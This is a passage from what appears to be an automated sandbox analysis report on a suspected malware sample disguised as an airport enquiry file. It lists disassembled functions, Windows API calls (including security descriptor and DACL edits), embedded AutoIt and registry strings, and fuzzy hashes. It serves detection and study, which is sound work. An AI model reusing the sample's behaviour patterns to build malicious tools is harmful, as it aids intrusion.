            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
            • API String ID: 169749273-3440237614
            • Opcode ID: 4c8292dc7d505b179cf8001291ff34a4fa6e2c433e1b3fcfbf0cb9d781fa6def
            • Instruction ID: 1999bf237a5a54f3b10c4b884bbd53b0f78c25db142a37546bd27969d0c64e9e
            • Opcode Fuzzy Hash: 4c8292dc7d505b179cf8001291ff34a4fa6e2c433e1b3fcfbf0cb9d781fa6def
            • Instruction Fuzzy Hash: CC618E71108301AFC710EF54DC85EAFBBE8EF89714F500A1EF596922A1DB70DA09DB66
            Function 00D04619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00D046AB
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D046F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharMessageSendUpper
            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
            • API String ID: 3974292440-4258414348
            • Opcode ID: 0470576f5f5915b9de11b707407b169ff54545fc0c7cd85e5b8276457bc75449
            • Instruction ID: 8dfcfa819ffe8794f65805b553a9d0ec22283bf55fc1918bc6b154cb7ce298fc
            • Opcode Fuzzy Hash: 0470576f5f5915b9de11b707407b169ff54545fc0c7cd85e5b8276457bc75449
            • Instruction Fuzzy Hash: C291A1B46043019FCB14EF10C491B6EB7A1EF85358F14886DF99A5B3A2DB31ED06EB91
            Function 00D0BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
            Download Yara Rule
            APIs
            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D0BB6E
            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00D06D80,?), ref: 00D0BBCA
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D0BC03
            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D0BC46
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D0BC7D
            • FreeLibrary.KERNEL32(?), ref: 00D0BC89
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0BC99
            • DestroyIcon.USER32(?), ref: 00D0BCA8
            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D0BCC5
            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D0BCD1
              • Part of subcall function 00CA313D: __wcsicmp_l.LIBCMT ref: 00CA31C6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
            • String ID: .dll$.exe$.icl
            • API String ID: 1212759294-1154884017
            • Opcode ID: af1f56bc62edebca39e318c590a02923e614b37b6ce3e4a9c5a6bf65edeee45d
            • Instruction ID: 71d1a211d4b17bb25b870e1eee4184cd7fa901bd3ac6aecb49bff29b0c6705d3
            • Opcode Fuzzy Hash: af1f56bc62edebca39e318c590a02923e614b37b6ce3e4a9c5a6bf65edeee45d
            • Instruction Fuzzy Hash: 2B61BE71504319BEEB24DF74CC85BBE77A8EB08721F20451AF919D62D0DBB4A990DBB0
            Function 00CEA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CharLowerBuffW.USER32(?,?), ref: 00CEA636
            • GetDriveTypeW.KERNEL32 ref: 00CEA683
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA6CB
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA702
            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CEA730
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
            • API String ID: 2698844021-4113822522
            • Opcode ID: 7887af355c504dc86a9bdc508edc0c9835cd96e912799dae1e73119988c25abb
            • Instruction ID: 652f133409d99356ac92a329d300a7f969ee7672ec9b32c65631f87d0cd6fb6b
            • Opcode Fuzzy Hash: 7887af355c504dc86a9bdc508edc0c9835cd96e912799dae1e73119988c25abb
            • Instruction Fuzzy Hash: 3751AD711047059FC700EF25C88196AB7F8FF98718F14496DF89A972A1DB31EE0ADB52
            Function 00CEA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
            Download Yara Rule
            APIs
            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CEA47A
            • __swprintf.LIBCMT ref: 00CEA49C
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CEA4D9
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CEA4FE
            • _memset.LIBCMT ref: 00CEA51D
            • _wcsncpy.LIBCMT ref: 00CEA559
            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CEA58E
            • CloseHandle.KERNEL32(00000000), ref: 00CEA599
            • RemoveDirectoryW.KERNEL32(?), ref: 00CEA5A2
            • CloseHandle.KERNEL32(00000000), ref: 00CEA5AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
            • String ID: :$\$\??\%s
            • API String ID: 2733774712-3457252023
            • Opcode ID: fe3e6b3c1812e66bf80834a4be88ac81936eb28adb29aed185960ef6a5159fca
            • Instruction ID: 4bd2c4ab5edba832c1a5fbb782895364bdbb1500bc580df8cd2e0f8923cbe5e0
            • Opcode Fuzzy Hash: fe3e6b3c1812e66bf80834a4be88ac81936eb28adb29aed185960ef6a5159fca
            • Instruction Fuzzy Hash: FD31B2B150024AABDB21DFA1DC49FEB77BCEF89701F2041B6F918D2160E770A7448B25
            Function 00CBAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
            • String ID:
            • API String ID: 884005220-0
            • Opcode ID: b15437ff353952f5125ce631e8600e032479e36635af21443fc4dc8fc742af3d
            • Instruction ID: 8200ca39db0e0f733cdf7ac41fd4275de657604016b8dc7b8391bcf6789c664f
            • Opcode Fuzzy Hash: b15437ff353952f5125ce631e8600e032479e36635af21443fc4dc8fc742af3d
            • Instruction Fuzzy Hash: 76610872900316AFDB209F74DC42BE97BA5EF12325F104119E8A1DB2D1DB35DE80D7A2
            Function 00CEDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
            Download Yara Rule
            APIs
            • __wsplitpath.LIBCMT ref: 00CEDC7B
            • _wcscat.LIBCMT ref: 00CEDC93
            • _wcscat.LIBCMT ref: 00CEDCA5
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CEDCBA
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEDCCE
            • GetFileAttributesW.KERNEL32(?), ref: 00CEDCE6
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CEDD00
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEDD12
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
            • String ID: *.*
            • API String ID: 34673085-438819550
            • Opcode ID: 59cbe47c283e2c1d067cc1b02c9ac0e466baf33d270572800904211405b45ea2
            • Instruction ID: c4c645396d57d544213c5d9010512c9a7e369172976db8537f06cb3264f40f99
            • Opcode Fuzzy Hash: 59cbe47c283e2c1d067cc1b02c9ac0e466baf33d270572800904211405b45ea2
            • Instruction Fuzzy Hash: 6681A4715043819FCB24EF26C8459AEB7E8BF88354F19882EF89AC7250E770DA45DB52
            Function 00D0C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D0C4EC
            • GetFocus.USER32 ref: 00D0C4FC
            • GetDlgCtrlID.USER32(00000000), ref: 00D0C507
            • _memset.LIBCMT ref: 00D0C632
            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D0C65D
            • GetMenuItemCount.USER32(?), ref: 00D0C67D
            • GetMenuItemID.USER32(?,00000000), ref: 00D0C690
            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D0C6C4
            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D0C70C
            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D0C744
            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D0C779
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
            • String ID: 0
            • API String ID: 1296962147-4108050209
            • Opcode ID: 3402393c6fde5cd27afca61a9c871454546a2ce35757df36a4370082970307d8
            • Instruction ID: feab0232472787e312d15163cda7e8f914924d2b4116e3e72c78db74c213182d
            • Opcode Fuzzy Hash: 3402393c6fde5cd27afca61a9c871454546a2ce35757df36a4370082970307d8
            • Instruction Fuzzy Hash: 16817D746183019FD720DF14C884BABBBE8FB89314F14162DF999972A1D771D905CBB2
            Function 00CD83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
              • Part of subcall function 00CD874A: GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
              • Part of subcall function 00CD874A: GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
              • Part of subcall function 00CD874A: HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
              • Part of subcall function 00CD87E7: GetProcessHeap.KERNEL32(00000008,00CD8240,00000000,00000000,?,00CD8240,?), ref: 00CD87F3
              • Part of subcall function 00CD87E7: HeapAlloc.KERNEL32(00000000,?,00CD8240,?), ref: 00CD87FA
              • Part of subcall function 00CD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CD8240,?), ref: 00CD880B
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD8458
            • _memset.LIBCMT ref: 00CD846D
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD848C
            • GetLengthSid.ADVAPI32(?), ref: 00CD849D
            • GetAce.ADVAPI32(?,00000000,?), ref: 00CD84DA
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD84F6
            • GetLengthSid.ADVAPI32(?), ref: 00CD8513
            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CD8522
            • HeapAlloc.KERNEL32(00000000), ref: 00CD8529
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD854A
            • CopySid.ADVAPI32(00000000), ref: 00CD8551
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD8582
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD85A8
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD85BC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
            • String ID:
            • API String ID: 3996160137-0
            • Opcode ID: 02f17bf04e1475007faddca5403f6c48a9de2a47e375616d76d038532d18df56
            • Instruction ID: b6269ea2e9b8d9527143648c706a4b6923a1c055e45539c211298c6ba3ef4d14
            • Opcode Fuzzy Hash: 02f17bf04e1475007faddca5403f6c48a9de2a47e375616d76d038532d18df56
            • Instruction Fuzzy Hash: 29612C71900209ABDF10DF95EC45AAEBBB9FF04710F14816AF925E7391EB319A09CF60
            Function 00CF762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
            Download Yara Rule
            APIs
            • GetDC.USER32(00000000), ref: 00CF76A2
            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CF76AE
            • CreateCompatibleDC.GDI32(?), ref: 00CF76BA
            • SelectObject.GDI32(00000000,?), ref: 00CF76C7
            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CF771B
            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CF7757
            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CF777B
            • SelectObject.GDI32(00000006,?), ref: 00CF7783
            • DeleteObject.GDI32(?), ref: 00CF778C
            • DeleteDC.GDI32(00000006), ref: 00CF7793
            • ReleaseDC.USER32(00000000,?), ref: 00CF779E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
            • String ID: (
            • API String ID: 2598888154-3887548279
            • Opcode ID: 07e57087bd98bcf06aa150fd5148368b8f86e0a2ce4b570474ef2d0c2e38f2a2
            • Instruction ID: ad34c86c932f71f8cd4ad9fbbf1da2b04d43911480d5dca2abaec98e3ba27e07
            • Opcode Fuzzy Hash: 07e57087bd98bcf06aa150fd5148368b8f86e0a2ce4b570474ef2d0c2e38f2a2
            • Instruction Fuzzy Hash: 71513875904309EFCB25CFA8CC85EAEBBB9EF48310F14852DFA59D7210D731A9408B60
            Function 00CEA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
            Download Yara Rule
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,00D0FB78), ref: 00CEA0FC
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CEA11E
            • __swprintf.LIBCMT ref: 00CEA177
            • __swprintf.LIBCMT ref: 00CEA190
            • _wprintf.LIBCMT ref: 00CEA246
            • _wprintf.LIBCMT ref: 00CEA264
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LoadString__swprintf_wprintf$_memmove
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
            • API String ID: 311963372-2391861430
            • Opcode ID: eb1c3e81711ac544271f2057d8c8f8365068b359452f86bc31c8bbfb947d60d5
            • Instruction ID: c013cc33843c3d730b1433cc8b62d5b8b7f7ec7bf0bc149bcf6b7ad1f5f4ccf2
            • Opcode Fuzzy Hash: eb1c3e81711ac544271f2057d8c8f8365068b359452f86bc31c8bbfb947d60d5
            • Instruction Fuzzy Hash: 8E514871904209BFCF15FBE0CD86AEEB778AF05304F200265B515B21A1EB71AF58EB65
            Function 00C86BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C86C6C,?,00008000), ref: 00CA0BB7
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C86D0D
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C86E5A
              • Part of subcall function 00C859CD: _wcscpy.LIBCMT ref: 00C85A05
              • Part of subcall function 00CA387D: _iswctype.LIBCMT ref: 00CA3885
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
            • API String ID: 537147316-1018226102
            • Opcode ID: 8fd063b2e9be72730d52e907aab7947397bcd124c9b27617c213876329cafa5a
            • Instruction ID: 15e19405ae44450a532e9bd0f934b8ade80084c97d2c900e59e86b1f94f3cc20
            • Opcode Fuzzy Hash: 8fd063b2e9be72730d52e907aab7947397bcd124c9b27617c213876329cafa5a
            • Instruction Fuzzy Hash: D002BD301083419FC724EF24C881AEFBBE5BF89758F14091DF49A972A1DB70DA49EB56
            Function 00C845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00C845F9
            • GetMenuItemCount.USER32(00D46890), ref: 00CBD7CD
            • GetMenuItemCount.USER32(00D46890), ref: 00CBD87D
            • GetCursorPos.USER32(?), ref: 00CBD8C1
            • SetForegroundWindow.USER32(00000000), ref: 00CBD8CA
            • TrackPopupMenuEx.USER32(00D46890,00000000,?,00000000,00000000,00000000), ref: 00CBD8DD
            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CBD8E9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
            • String ID:
            • API String ID: 2751501086-0
            • Opcode ID: faa4d38186f181d3bba3674cedb9b63ddf950ba22dfe302231713498072391b6
            • Instruction ID: b193fe8efb9f03dd9ea13e57589ba745733ae50d6644df60f473e1a08685dedb
            • Opcode Fuzzy Hash: faa4d38186f181d3bba3674cedb9b63ddf950ba22dfe302231713498072391b6
            • Instruction Fuzzy Hash: 2C710570600216BEEB349F15DC89FEABF69FF05368F200216F52AA61E0DBB15910DB94
            Function 00D010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpper
            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
            • API String ID: 3964851224-909552448
            • Opcode ID: 3aa733fa231bebc739fc7ecbcc76b9593943b0b23a4ecf1242d374335f57aac4
            • Instruction ID: 35dcbe253db9a6179e05d24e130cde9d20b5858cf19b529559793799c8e7f433
            • Opcode Fuzzy Hash: 3aa733fa231bebc739fc7ecbcc76b9593943b0b23a4ecf1242d374335f57aac4
